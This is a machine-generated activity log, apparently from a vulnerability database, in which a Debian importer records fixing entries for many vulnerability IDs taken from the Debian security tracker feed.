2026-04-03T07:26:54.443758+00:00 Debian Importer Fixing VCID-tdsq-gc81-hqda https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.385224+00:00 Debian Importer Fixing VCID-59yn-uan9-sucn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.327667+00:00 Debian Importer Fixing VCID-tvzz-994x-xbcc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.269055+00:00 Debian Importer Fixing VCID-8drx-cw3m-dufq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.210595+00:00 Debian Importer Fixing VCID-38u3-s4ys-bue5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.151454+00:00 Debian Importer Fixing VCID-1yte-8nb7-fqaw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.092169+00:00 Debian Importer Fixing VCID-1a39-qxtg-fkhx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:54.034313+00:00 Debian Importer Fixing VCID-sr4g-yz6w-ebfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.976635+00:00 Debian Importer Fixing VCID-bmhu-4vgv-y7gy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.917899+00:00 Debian Importer Fixing VCID-knc1-7mhm-vbhn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.859702+00:00 Debian Importer Fixing VCID-txaa-zcha-wbbv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.801464+00:00 Debian Importer Fixing VCID-rbgb-rbtn-eqff https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.743163+00:00 Debian Importer Fixing VCID-sywj-rqp4-23dd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.684966+00:00 Debian Importer Fixing VCID-n7rz-ssve-t7bm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.626380+00:00 Debian Importer Fixing VCID-7kza-xvmr-sqhe https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.567464+00:00 Debian Importer Fixing VCID-7bjy-zdas-9yfv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.510175+00:00 Debian Importer Fixing VCID-uc6k-xc2v-kbas https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.452173+00:00 Debian Importer Fixing VCID-56ad-fjzb-bycr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.395574+00:00 Debian Importer Fixing VCID-zz1j-vw4k-ukdc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.338833+00:00 Debian Importer Fixing VCID-qkw5-9mqc-a7a3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.282039+00:00 Debian Importer Fixing VCID-raec-f3zw-bfdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.233962+00:00 Debian Importer Fixing VCID-6nrh-wh65-nben https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.185494+00:00 Debian Importer Fixing VCID-j8rp-wchj-qfhz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.136652+00:00 Debian Importer Fixing VCID-fdav-btjk-pkbe https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.088144+00:00 Debian Importer Fixing VCID-qc16-r3cs-cbdr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:53.039374+00:00 Debian Importer Fixing VCID-a1z8-rynx-p7a8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.990718+00:00 Debian Importer Fixing VCID-hz8y-hdp6-t3bx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.934538+00:00 Debian Importer Fixing VCID-2t4v-16se-7qef https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.876500+00:00 Debian Importer Fixing VCID-ehgb-g7qu-97an https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.817646+00:00 Debian Importer Fixing VCID-u7dc-kx3v-4ffz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.761120+00:00 Debian Importer Fixing VCID-x19m-3m6f-4khb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.701762+00:00 Debian Importer Fixing VCID-zfy5-md9a-h3gy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.646105+00:00 Debian Importer Fixing VCID-wd77-5tpf-6yhy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.589887+00:00 Debian Importer Fixing VCID-kuyn-8jwc-qyb9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.533375+00:00 Debian Importer Fixing VCID-vyfj-c9vq-wkc9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.476372+00:00 Debian Importer Fixing VCID-x7g7-5k9x-gbay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.419643+00:00 Debian Importer Fixing VCID-dmut-jm9s-8ucc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.362986+00:00 Debian Importer Fixing VCID-v6h3-xnz8-xud4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.305773+00:00 Debian Importer Fixing VCID-evu2-cxt1-4qhq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.249462+00:00 Debian Importer Fixing VCID-k4w2-craz-13b9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.192429+00:00 Debian Importer Fixing VCID-fq6e-k53f-jugt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.135654+00:00 Debian Importer Fixing VCID-7pyx-kb1k-wufg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.076993+00:00 Debian Importer Fixing VCID-ru3u-g5g8-zbcn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:52.019360+00:00 Debian Importer Fixing VCID-zyh3-cmka-wqb8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.961564+00:00 Debian Importer Fixing VCID-x6ad-gnf9-ebes https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.904983+00:00 Debian Importer Fixing VCID-shzj-77rr-n3g4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.848606+00:00 Debian Importer Fixing VCID-1ppp-hukx-syb3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.791882+00:00 Debian Importer Fixing VCID-7mqx-nap6-97cr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.735379+00:00 Debian Importer Fixing VCID-yz4e-znfx-zqhe https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.678950+00:00 Debian Importer Fixing VCID-3eje-68bz-k7ej https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.616891+00:00 Debian Importer Fixing VCID-bgej-fguz-9fcv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.551713+00:00 Debian Importer Fixing VCID-k6ar-hru3-hygu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.485620+00:00 Debian Importer Fixing VCID-xp7w-rc4w-jqcj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.427796+00:00 Debian Importer Fixing VCID-cvqm-2557-e7ba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.365808+00:00 Debian Importer Fixing VCID-5qyh-zkxd-73c5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.308801+00:00 Debian Importer Fixing VCID-wykb-4z7x-q7ga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.249775+00:00 Debian Importer Fixing VCID-y8aj-9qsj-7ucs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.191729+00:00 Debian Importer Fixing VCID-1v6v-gk53-8ye7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.131919+00:00 Debian Importer Fixing VCID-s293-ewpe-3ufa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.072911+00:00 Debian Importer Fixing VCID-rmg9-7tdv-eyh4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:51.015578+00:00 Debian Importer Fixing VCID-vzhq-5h21-xuhk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.958556+00:00 Debian Importer Fixing VCID-fnmv-18fv-8kf3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.901262+00:00 Debian Importer Fixing VCID-65cc-fm97-5uad https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.839166+00:00 Debian Importer Fixing VCID-ajsf-6r6w-juey https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.782430+00:00 Debian Importer Fixing VCID-u1fg-v9f6-z7ev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.725505+00:00 Debian Importer Fixing VCID-x8j9-exk2-mkez https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.668999+00:00 Debian Importer Fixing VCID-je9u-1h5v-hbct https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.611813+00:00 Debian Importer Fixing VCID-98sh-zs45-hyag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.554965+00:00 Debian Importer Fixing VCID-ne72-mzag-2keg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.497765+00:00 Debian Importer Fixing VCID-8gvq-1vk8-17bx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.440732+00:00 Debian Importer Fixing VCID-w5fb-28z5-rkfq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.383297+00:00 Debian Importer Fixing VCID-dw5u-34qe-cuat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.326056+00:00 Debian Importer Fixing VCID-hnhy-ksua-juam https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.269602+00:00 Debian Importer Fixing VCID-wjeh-7bpm-zyga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.213187+00:00 Debian Importer Fixing VCID-x6ab-eb8b-t3e7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.156649+00:00 Debian Importer Fixing VCID-ge69-ta6r-e3cj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.100373+00:00 Debian Importer Fixing VCID-xfd9-xwru-aubv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:50.043352+00:00 Debian Importer Fixing VCID-a4jk-v4s2-r7dy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.987053+00:00 Debian Importer Fixing VCID-zuht-nypg-33fg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.930435+00:00 Debian Importer Fixing VCID-cqpp-1e1t-x7aa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.873201+00:00 Debian Importer Fixing VCID-n6gp-848w-nbam https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.816855+00:00 Debian Importer Fixing VCID-887b-1pwe-nqdd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.758390+00:00 Debian Importer Fixing VCID-ur3j-m1rh-q3dn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.699960+00:00 Debian Importer Fixing VCID-rm64-smat-8kfw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.643671+00:00 Debian Importer Fixing VCID-ksuz-r36k-wygy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.586907+00:00 Debian Importer Fixing VCID-q5su-zt4m-sqgx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.530217+00:00 Debian Importer Fixing VCID-qtmc-prbr-jbc9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.481814+00:00 Debian Importer Fixing VCID-2yeg-fvbe-f3bz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.425612+00:00 Debian Importer Fixing VCID-ray4-6nnk-93f7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.368445+00:00 Debian Importer Fixing VCID-epd6-xsva-17ea https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.310121+00:00 Debian Importer Fixing VCID-fvny-qu61-fbf4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.252144+00:00 Debian Importer Fixing VCID-uhe3-t6mw-ckd2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.193771+00:00 Debian Importer Fixing VCID-ywg5-azha-e7gt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.137264+00:00 Debian Importer Fixing VCID-4yhn-j5se-kfhv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.081227+00:00 Debian Importer Fixing VCID-vc8u-8je2-kfgt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:49.024543+00:00 Debian Importer Fixing VCID-1y2e-akpf-ufbc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.966413+00:00 Debian Importer Fixing VCID-rwnm-ssex-tfgr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.910284+00:00 Debian Importer Fixing VCID-wz1j-6ne4-m3a5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.852205+00:00 Debian Importer Fixing VCID-zrke-eysb-37e1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.796184+00:00 Debian Importer Fixing VCID-x9m3-pune-akdj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.738402+00:00 Debian Importer Fixing VCID-yj6z-ege2-37gt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.680922+00:00 Debian Importer Fixing VCID-xzye-g5rw-fyh5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.623968+00:00 Debian Importer Fixing VCID-fvws-m1ay-aud1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.554154+00:00 Debian Importer Fixing VCID-znwq-9jw9-abgx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.506741+00:00 Debian Importer Fixing VCID-ebyn-hv86-8kdz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.450774+00:00 Debian Importer Fixing VCID-5sxs-wpy9-rqfn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.394557+00:00 Debian Importer Fixing VCID-hmcd-f6k1-kkd4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.337578+00:00 Debian Importer Fixing VCID-p84t-bztf-cqdz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.281501+00:00 Debian Importer Fixing VCID-3cn6-jf51-3qdv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.223936+00:00 Debian Importer Fixing VCID-w278-q56x-j7fw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.176300+00:00 Debian Importer Fixing VCID-zz57-zmka-33ev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.126961+00:00 Debian Importer Fixing VCID-4qbq-95vy-k7bv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.069476+00:00 Debian Importer Fixing VCID-j1hu-4c4d-ske6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:48.020618+00:00 Debian Importer Fixing VCID-8b34-juwg-pkcb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.962806+00:00 Debian Importer Fixing VCID-qxe7-vuy5-9ycg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.906472+00:00 Debian Importer Fixing VCID-vv56-v3c7-kfa1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.850459+00:00 Debian Importer Fixing VCID-ephb-spyf-c7d2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.792535+00:00 Debian Importer Fixing VCID-39mw-qs6j-83eu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.735644+00:00 Debian Importer Fixing VCID-nvpf-y2es-3fcz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.678008+00:00 Debian Importer Fixing VCID-7hxc-bmqq-pyf3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.619615+00:00 Debian Importer Fixing VCID-dt8r-gjff-pqe4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.571487+00:00 Debian Importer Fixing VCID-cznc-ubr4-zkcu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.514538+00:00 Debian Importer Fixing VCID-sdw2-cg48-b3fd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.457327+00:00 Debian Importer Fixing VCID-bjr3-shza-a7hc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.410068+00:00 Debian Importer Fixing VCID-tspc-ndj7-37h5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.349717+00:00 Debian Importer Fixing VCID-my4x-d8ru-pybj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.279369+00:00 Debian Importer Fixing VCID-hx15-dy4p-uycu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.217746+00:00 Debian Importer Fixing VCID-ak8s-9hyp-47fa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.160136+00:00 Debian Importer Fixing VCID-sz6p-kkuh-fkeu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.102456+00:00 Debian Importer Fixing VCID-qsna-fp92-syce https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:47.044769+00:00 Debian Importer Fixing VCID-bs5z-jh2d-nfgv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:26:46.996419+00:00 Debian Importer Fixing VCID-dfzv-wzru-w3gx https://security-tracker.debian.org/tracker/data/json 38.1.0